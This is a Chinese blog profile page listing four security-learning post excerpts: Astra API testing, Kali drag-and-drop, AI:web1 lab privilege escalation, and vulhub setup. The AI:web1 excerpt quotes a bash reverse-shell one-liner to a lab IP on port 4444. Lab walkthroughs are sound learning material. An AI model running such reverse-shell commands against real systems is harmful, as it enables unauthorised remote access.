- 博客(4)
- 问答 (1)
- 收藏
- 关注
RSS订阅原创 Astra:针对REST API的自动化安全测试工具安装过程遇到的坑
REST即访问性状态传递(英文Representational State Transfer,简称REST)是新兴的WEB协议,访问方式和普通的HTTP类似,分GET和POST两种请求方式。REST API 的渗透测试非常复杂,因为现有的 API 会不断更新和变化,而且还会不断增加新的 API。可以帮助他们完成大量工作,并在开发周期的早期过程中可以检测并修复安全漏洞。Astra可以自动检测并测试登录和退出功能(认证API),因此任何人都可以轻松将其集成到CICD管道中。主题,Astra还可以将API**
2021-07-05 10:47:17
489
原创 Kali Linux 2019.4如何拖拽文件
kali linux2019.4版本刚上线,手痒的很,下载一个试试,安装上不能拖拽文件,我这暴脾气,不允许,共享文件夹试了,不行(也可能是技术不到位),无意中发现一个完全不需要配置,直接拖拽的方法。第一步:kali打开命令行。第二步:把windows文件拖拽进命令行。很明显,这里是支持拖拽进命令行的。拖拽完了显示一个路径。去这个路径里找想要的文件吧。一共两步,简单实...
2019-12-10 09:46:38
2118
1
原创 AI:web1提权
1.AI:web1前期端口扫描和sql注入不再提了,教程也有很多,直接说提权。2.傻傻的上传了一个php文件,想要反弹shell,bash -i >& /dev/tcp/192.168.133.128/4444 0>&1,监听4444端口,访问这个php文件,结果并没有结果,一定是姿势不对。3.监听4444端口在kali os-shell执行py...
2019-12-09 17:14:38
337
原创 Kali Linux 2019.4安装vulhub
作为一个安全小白,本来想下载个最新版虚拟机版本Kali Linux搞一搞靶场,结果没找到vulhub和docker。自己动手丰衣足食,自己安装一下就好,也遇到了多的坑。命令如下:apt-get update ##象征性的更新一下软件apt install docker.io ##安装dockerdocker -v ##看docker版本,是不是安上了systemctl sta...
2019-12-03 10:55:19
1910
3
空空如也
找不到org.insightech
2017-10-26
TA创建的收藏夹 TA关注的收藏夹
TA关注的人